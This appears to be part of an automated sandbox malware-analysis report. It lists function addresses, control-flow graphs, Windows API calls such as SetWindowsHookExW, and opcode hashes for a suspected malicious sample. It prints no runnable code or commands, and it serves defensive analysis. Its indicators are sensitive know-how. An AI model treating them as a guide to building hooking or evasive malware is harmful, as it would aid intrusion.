                                                                      control_flow_graph 1282 36911b78-36911b94 1284 36911b96-36911b98 1282->1284 1285 36911b9d-36911bad 1282->1285 1286 3691202a-36912032 1284->1286 1288 36912033-36912038 1285->1288 1289 36911bb3-36911bc1 1285->1289 1290 36912039-36912083 1288->1290 1289->1288 1292 36911bc7 1289->1292 1299 36912084-3691208a 1290->1299 1292->1286 1299->1290 1301 3691208c-369120fc 1299->1301 1301->1299 1306 369120fe-36912117 1301->1306 1308 36912133-36912141 1306->1308 1309 36912119-36912131 1306->1309 1313 36912148-3691214d 1308->1313 1309->1313 1443 3691214f call 36911bd1 1313->1443 1444 3691214f call 36912100 1313->1444 1445 3691214f call 36911b78 1313->1445 1314 36912155-3691215b 1315 369123e1-36912406 1314->1315 1316 36912161-3691216f 1314->1316 1321 36912415-36912426 1315->1321 1322 36912408-3691240e 1315->1322 1319 36912171-36912178 1316->1319 1320 369121c7-369121d0 1316->1320 1325 369122d1-369122fd 1319->1325 1326 3691217e-36912183 1319->1326 1323 36912304-36912330 1320->1323 1324 369121d6-369121da 1320->1324 1332 369124b9-369124bb 1321->1332 1333 3691242c-36912430 1321->1333 1322->1321 1375 36912337-369123a1 1323->1375 1328 369121eb-36912210 call 36912ba0 1324->1328 1329 369121dc-369121e5 1324->1329 1325->1323 1330 36912185-3691218b 1326->1330 1331 3691219b-369121a9 1326->1331 1344 36912212-3691221d 1328->1344 1345 3691222b-3691222f 1328->1345 1329->1323 1329->1328 1335 3691218d 1330->1335 1336 3691218f-36912199 1330->1336 1348 369121b2-369121c2 1331->1348 1349 369121ab-369121ad 1331->1349 1446 369124bd call 36911bd1 1332->1446 1447 369124bd call 36912100 1332->1447 1448 369124bd call 369125a8 1332->1448 1449 369124bd call 36911b78 1332->1449 1338 36912440-3691244d 1333->1338 1339 36912432-3691243e 1333->1339 1335->1331 1336->1331 1361 3691244f-36912458 1338->1361 1339->1361 1343 369124c3-369124c9 1351 369124d5-369124dc 1343->1351 1352 369124cb-369124d1 1343->1352 1451 36912220 call 36914535 1344->1451 1452 36912220 call 36914478 1344->1452 1355 36912235-36912239 1345->1355 1356 369123a8-369123da 1345->1356 1350 369122c7-369122ce 1348->1350 1349->1350 1359 369124d3 1352->1359 1360 36912537-36912596 1352->1360 1355->1356 1364 3691223f-3691224a 1355->1364 1356->1315 1359->1351 1390 3691259d-369125ce 1360->1390 1373 36912485-36912489 1361->1373 1374 3691245a-36912469 1361->1374 1362 36912226 1362->1350 1364->1356 1371 36912250-3691227d 1364->1371 1371->1356 1388 36912283-3691229f 1371->1388 1376 36912495-36912499 1373->1376 1377 3691248b-36912491 1373->1377 1385 36912479-36912483 1374->1385 1386 3691246b-36912472 1374->1386 1375->1356 1376->1351 1383 3691249b-3691249f 1376->1383 1381 36912493 1377->1381 1382 369124df-36912530 1377->1382 1381->1351 1382->1360 1389 369124a5-369124b7 1383->1389 1383->1390 1385->1373 1386->1385 1388->1375 1399 369122a5-369122bf 1388->1399 1389->1351 1403 369125d0-369125dd 1390->1403 1404 369125f3-369125f8 1390->1404 1399->1356 1413 369122c5 1399->1413 1414 369125ef-369125f1 1403->1414 1415 369125df-369125ed 1403->1415 1411 36912600 1404->1411 1416 36912602-3691260b 1411->1416 1413->1350 1414->1416 1415->1416 1424 36912633-36912635 call 36912688 1416->1424 1425 3691260d-3691261b 1416->1425 1428 3691263b-3691263f 1424->1428 1434 36912628-36912631 1425->1434 1435 3691261d-36912621 1425->1435 1432 36912641-36912656 1428->1432 1433 36912658-3691265c 1428->1433 1437 3691267a-36912680 1432->1437 1433->1437 1438 3691265e-36912673 1433->1438 1434->1424 1435->1434 1438->1437 1443->1314 1444->1314 1445->1314 1446->1343 1447->1343 1448->1343 1449->1343 1451->1362 1452->1362
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0P$0P
                                                                      • API String ID: 0-576979913
                                                                      • Opcode ID: 8ead7fa6ee07324739afdecc664bd5877db06abb7367e99e864028929b7728ef
                                                                      • Instruction ID: cf2577d8ee7f07b0a1d04ffda99060adecdcd36504cd6dd77c6a89c251503a89
                                                                      • Opcode Fuzzy Hash: 8ead7fa6ee07324739afdecc664bd5877db06abb7367e99e864028929b7728ef
                                                                      • Instruction Fuzzy Hash: 80518731B082591FDB06AB38881864E7B669FC2210F78426AD045CF392CF758C47C3D5
                                                                      Function 36911020 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1486 36911020-369114ff 1501 36911502-36911513 1486->1501 1502 36911515-3691155d 1486->1502 1501->1502 1504 36911563 1502->1504 1505 3691155f-36911561 1502->1505 1506 36911566-36911598 1504->1506 1505->1506 1511 369115a5-369115bb 1506->1511 1512 3691159a-36911644 1506->1512 1520 369115be call 369117c1 1511->1520 1521 369115be call 369117c8 1511->1521 1516 369115c3-369115d9 call 36911020 1520->1516 1521->1516
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0P$0P
                                                                      • API String ID: 0-576979913
                                                                      • Opcode ID: e54086e60e8eb9f9f6e24fefd939aa28b7bfc766f149c9d5da740b29524fac19
                                                                      • Instruction ID: 02d72eff24e168c23fec976c5a76187fef5f7bfc77cd654e9af18db01cbc3a85
                                                                      • Opcode Fuzzy Hash: e54086e60e8eb9f9f6e24fefd939aa28b7bfc766f149c9d5da740b29524fac19
                                                                      • Instruction Fuzzy Hash: 98312B75F002145BDB09A7B588643AF7AA36FC6240B38813DD446EB396DD758C028BD5
                                                                      Function 37896924 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37896A42
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: c9e598b2610410843d36566cddecc7d4dba27f476c503420f4e8d5677951b35a
                                                                      • Instruction ID: 63256e2a4ec0d3ae3ea41f708828854ace7bf2e60783370666d50c6a4fda8c96
                                                                      • Opcode Fuzzy Hash: c9e598b2610410843d36566cddecc7d4dba27f476c503420f4e8d5677951b35a
                                                                      • Instruction Fuzzy Hash: 8651CFB5D003499FDB14CF9AC984ADEBBB5FF89350F64812AE818AB210D770A845CF90
                                                                      Function 37896930 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37896A42
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: f3d5400e48b5c4ef2d2e45920d0172aa01e9a7cf0745f2212405c26ae441ca91
                                                                      • Instruction ID: fe1abd470de3e390fc32b513e0caef608ef6bbd959ea29276090b384b15f6009
                                                                      • Opcode Fuzzy Hash: f3d5400e48b5c4ef2d2e45920d0172aa01e9a7cf0745f2212405c26ae441ca91
                                                                      • Instruction Fuzzy Hash: FA41B0B5D003499FDB14CF9AC984ADEBBF5FF89350F64812AE818AB210D770A845CF90
                                                                      Function 378979BC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 37899681
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: 12c7322ebfe79db6118956cfe6687d16574f5714f59a14f5098fbc664ebbdb30
                                                                      • Instruction ID: 4c947b69f809d8570b7f2f8a4978efdd897a26e6cec9bdd6454c2cfcef3d2dca
                                                                      • Opcode Fuzzy Hash: 12c7322ebfe79db6118956cfe6687d16574f5714f59a14f5098fbc664ebbdb30
                                                                      • Instruction Fuzzy Hash: 0D413AB9900309DFDB14CF99C844BAABBF5FF99310F25C859D518AB321D775A842CBA0
                                                                      Function 0015B400 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0015B48F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 9df4c1608635c0b68067495ffff02c54021b03a96f3c8110f589aed4ba31c46c
                                                                      • Instruction ID: 40411f43278d1e5d3870b3c977249b9e39d3d06a48b15f7dff6a488a735e8b7f
                                                                      • Opcode Fuzzy Hash: 9df4c1608635c0b68067495ffff02c54021b03a96f3c8110f589aed4ba31c46c
                                                                      • Instruction Fuzzy Hash: 4321E3B5900248EFDB20CFAAD985AEEBBF4EB48310F14841AE955A7310D374A944CFA5
                                                                      Function 0015B408 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0015B48F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: bb0cb19df8a467a9a9691ef82575ee7e52cb94833d4f9d95047d594b841143a2
                                                                      • Instruction ID: 28bb56f83c2cfb7b237c60ee2acfbb5913a48c0e79de8a849da728722872b9ef
                                                                      • Opcode Fuzzy Hash: bb0cb19df8a467a9a9691ef82575ee7e52cb94833d4f9d95047d594b841143a2
                                                                      • Instruction Fuzzy Hash: E321E4B59003489FDB10CFAAD984ADEBBF4EB48310F14841AE954A7310D374A944CF65
                                                                      Function 00156307 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00156383
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: 5405b38a130b67236df8ac65147a0a89bd23be20065c6e2bb27eac3dea3a49f1
                                                                      • Instruction ID: 0333323c220ce9de8e62c8c4850b102c07cb2e6d18c8082a109946c1f084649d
                                                                      • Opcode Fuzzy Hash: 5405b38a130b67236df8ac65147a0a89bd23be20065c6e2bb27eac3dea3a49f1
                                                                      • Instruction Fuzzy Hash: F22118B5D002098FDB24CF9AC844BEEBBF5FF88310F148419D469A7250C774A944CFA1
                                                                      Function 00156308 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00156383
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: 85e01395248e5368e081e5c4e383a72e76e0d86aca3d194d5963308744a26054
                                                                      • Instruction ID: 0333323c220ce9de8e62c8c4850b102c07cb2e6d18c8082a109946c1f084649d
                                                                      • Opcode Fuzzy Hash: 85e01395248e5368e081e5c4e383a72e76e0d86aca3d194d5963308744a26054
                                                                      • Instruction Fuzzy Hash: F22118B5D002098FDB24CF9AC844BEEBBF5FF88310F148419D469A7250C774A944CFA1
                                                                      Function 3789C460 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,3789C082,00000000,00000000,35630D08,345C721C), ref: 3789C4D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: a23f0adf2cfe2cf936c52d2f96667ec431dca00d072789fdbbb09a37cd7d9f7e
                                                                      • Instruction ID: 205275637dd730c9c8bc8412715ae9d3da6b164ab2497ef10fa16e41d29e5817
                                                                      • Opcode Fuzzy Hash: a23f0adf2cfe2cf936c52d2f96667ec431dca00d072789fdbbb09a37cd7d9f7e
                                                                      • Instruction Fuzzy Hash: 711117B59003099FDB20CF9AD845BEEBBF4EB49320F10842AE958A7251D374A554CFA5
                                                                      Function 3789ADB0 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,3789C082,00000000,00000000,35630D08,345C721C), ref: 3789C4D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: 7ac0e6309a7cdae17fc710471599dcdff677b3d2d46467c0d0689a281361af24
                                                                      • Instruction ID: 65b1daa9a375ce3ec326b15c05c8c51ca2a414d825f21577183cec20a16c0f19
                                                                      • Opcode Fuzzy Hash: 7ac0e6309a7cdae17fc710471599dcdff677b3d2d46467c0d0689a281361af24
                                                                      • Instruction Fuzzy Hash: 361159B5D043099FDB20CF9AD440BEEBBF4EB09310F10802AE954A7211C374A944CFA5
                                                                      Function 36914478 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0P
                                                                      • API String ID: 0-2168752328
                                                                      • Opcode ID: 5e25cdfbc289050c993c6ff735699f693d20babb07cc59c7bee8da793353289c
                                                                      • Instruction ID: f614ac1f29b7cb2a9ecdb816b9111605ba50cdcd5671ffbfc164c04bbd6ad3f7
                                                                      • Opcode Fuzzy Hash: 5e25cdfbc289050c993c6ff735699f693d20babb07cc59c7bee8da793353289c
                                                                      • Instruction Fuzzy Hash: 1231D235B042149FEB059F65D854BAE7BB6EFCD650F244129E506EB391CF359C02CBA0
                                                                      Function 3691019D Relevance: .4, Instructions: 360COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0060d96025896fe7612dcceff11a3fc878962dbcc72dd37a5791ccd9704f6dc7
                                                                      • Instruction ID: 7be03426acfcf820034c393c543fb9e8dfd3caf7c763864982908d5edc847a54
                                                                      • Opcode Fuzzy Hash: 0060d96025896fe7612dcceff11a3fc878962dbcc72dd37a5791ccd9704f6dc7
                                                                      • Instruction Fuzzy Hash: 0E31B730B04258DFDB15AB39C4606AE3BB6AFCA304F31406DD441AB395DF358C06CB95
                                                                      Function 36914677 Relevance: .4, Instructions: 353COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a740c83be5df28067e9953c4d3dcad49e5de45bcc23f40faf9e9f992cbbec7f
                                                                      • Instruction ID: 6ca700e39196745165fefe71ba4d9f99284a988183fcc0068b2176b0ab6dc0f1
                                                                      • Opcode Fuzzy Hash: 2a740c83be5df28067e9953c4d3dcad49e5de45bcc23f40faf9e9f992cbbec7f
                                                                      • Instruction Fuzzy Hash: E1E11975E00219CFDB01CFA9C984A9DBBF6BF4D710B6680A9E415AB361CB35EC41CB64
                                                                      Function 36910B40 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05aaf04a648bc78a854b833859df1439b4ffdf40d3cdfd5fba1a0c2729b053a4
                                                                      • Instruction ID: c46f22093c6e066ec34f08e1579657bb34b699b09988ef1fa1e48aff8fa1b4a7
                                                                      • Opcode Fuzzy Hash: 05aaf04a648bc78a854b833859df1439b4ffdf40d3cdfd5fba1a0c2729b053a4
                                                                      • Instruction Fuzzy Hash: 79B1B138B10308DFEB449B26D85176E77A6BBC8354F354069E816EB391DF76AD06CB80
                                                                      Function 36912688 Relevance: .2, Instructions: 228COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bfb3fcc3d7f9a778d9368db65b805d7fbd734c6565236a57030ad14aa0c63c4e
                                                                      • Instruction ID: 412e6b1716d49d8609ec63450c05d3b37d33e3cc1156785f16a002c19cd36854
                                                                      • Opcode Fuzzy Hash: bfb3fcc3d7f9a778d9368db65b805d7fbd734c6565236a57030ad14aa0c63c4e
                                                                      • Instruction Fuzzy Hash: F0819374E006098FEB05EFA9C480A9AB7B5FF49314B7181AAD415EF361CB31EC81CB95
                                                                      Function 36910B33 Relevance: .1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f58abc4408f86ec34da30b9c01f75f6653b1c068afb784e3b50286db5c10e686
                                                                      • Instruction ID: 67bf2f3e59b07d49b497d16dbd22d9358acddc5569fbf8dd24a4493be066fa71
                                                                      • Opcode Fuzzy Hash: f58abc4408f86ec34da30b9c01f75f6653b1c068afb784e3b50286db5c10e686
                                                                      • Instruction Fuzzy Hash: 0951B134B002089FEB099B76D85576E7AA3ABC9310F358428E816E7392DF798C45DB91
                                                                      Function 36910620 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d4f42ffebf242fd6a54e2bf40e35d2840846861ed11d11fe20210becf038d1d
                                                                      • Instruction ID: 00fad58f56856ba3acda944996d5eec03767ff5c1ecf890a2b7499b3df483478
                                                                      • Opcode Fuzzy Hash: 1d4f42ffebf242fd6a54e2bf40e35d2840846861ed11d11fe20210becf038d1d
                                                                      • Instruction Fuzzy Hash: 8E514B74B102089FEB14DB6AC858B5D7BF6BF89314F258169E405EB3A1CE75AC41CF90
                                                                      Function 36910610 Relevance: .1, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df634880b45359cf6296e4cf78a108c2ba62b43b321c3fa2a26c90291c1f16a1
                                                                      • Instruction ID: 360b92e824369d945616a197383f52deabf73a82b4ab156cbd931fab275838c4
                                                                      • Opcode Fuzzy Hash: df634880b45359cf6296e4cf78a108c2ba62b43b321c3fa2a26c90291c1f16a1
                                                                      • Instruction Fuzzy Hash: 09414974B102049FDB05DB79C858B5DBBE2BF89314F258169E406EB3A1DE75EC41CB90
                                                                      Function 369109D8 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5cf11f5eb3d58ee036063e8bc006dbcb1001eb955b061285e8ffa857e35b3a4d
                                                                      • Instruction ID: 8e45052b2c0bd1d221d24f534d888a314a991268854bdb6e82cea027789ca30b
                                                                      • Opcode Fuzzy Hash: 5cf11f5eb3d58ee036063e8bc006dbcb1001eb955b061285e8ffa857e35b3a4d
                                                                      • Instruction Fuzzy Hash: 1941D0B19043498FEB01DF6AD84469AFFF4FF89314F29816AD408E7211EB75A805CBA1
                                                                      Function 36910448 Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 242a1a276f781078a0f629db763433be75f2c2fa346bbb6ac958862c6bacbf89
                                                                      • Instruction ID: a8588d2d18ac6120e9c6472b3878e062acd77552c17a73843c37ae51e1b72c4b
                                                                      • Opcode Fuzzy Hash: 242a1a276f781078a0f629db763433be75f2c2fa346bbb6ac958862c6bacbf89
                                                                      • Instruction Fuzzy Hash: A7219F30B00218DFDB19AB3AC8606AE76B6BFC9704F31802DD502AB394DF359C46CB95
                                                                      Function 000AD0FC Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585094739.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ad000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a66bb997af9fe394662f5381687d2b539c3585a2d2ebae759f8d187f98ef633d
                                                                      • Instruction ID: fb6bc531fe717c6ea2404659956befc5c0954122e872798df69d1bb6c8858e24
                                                                      • Opcode Fuzzy Hash: a66bb997af9fe394662f5381687d2b539c3585a2d2ebae759f8d187f98ef633d
                                                                      • Instruction Fuzzy Hash: F42146B1604304EFDB15DF50C9C0B2ABBA1FB8A314F24C56ED90A4F646C33BD846CA62
                                                                      Function 000AD01C Relevance: .1, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585094739.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ad000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35125e109bf6190d4f1904d0fb23808797d3a2f10ab53fbe07541237bb271322
                                                                      • Instruction ID: d9e5fd9eda7b613dfd93a6384a0542d89dfaaa3351c32e97f0414d3a850e87f7
                                                                      • Opcode Fuzzy Hash: 35125e109bf6190d4f1904d0fb23808797d3a2f10ab53fbe07541237bb271322
                                                                      • Instruction Fuzzy Hash: CC2104B1604300DFDB24DF60C5C0F2ABBA1EB85314F24C66ED90A4B652C376D847CA62
                                                                      Function 369150D8 Relevance: .1, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc5ee8da39fcc1ae9411fbbb41ba488e849c944057e0aa1dc0ba2cd13efa4006
                                                                      • Instruction ID: 4ac46ba0194bc8fbe82e0178aa5d5f09007dc242484c3916c89816cbc19da26d
                                                                      • Opcode Fuzzy Hash: cc5ee8da39fcc1ae9411fbbb41ba488e849c944057e0aa1dc0ba2cd13efa4006
                                                                      • Instruction Fuzzy Hash: 0B11E939B00314ABFF19A6B55C117BE26575FC5250F248428FC25BF391DF7898018B90
                                                                      Function 369125A8 Relevance: .1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d77b068aec2a6d077249a01efc75fbe003049f2c7183a4c35fa993cb74019e3a
                                                                      • Instruction ID: af59d1d9e9a72a3f1a779fa54a2f5d185b0eb54c2def33dd4e0732b8b62bbb2d
                                                                      • Opcode Fuzzy Hash: d77b068aec2a6d077249a01efc75fbe003049f2c7183a4c35fa993cb74019e3a
                                                                      • Instruction Fuzzy Hash: DE110435B096568FDB066B29D86452EBB66FF8639176540AAE406CF391CF20DC01C7D0
                                                                      Function 369152F7 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
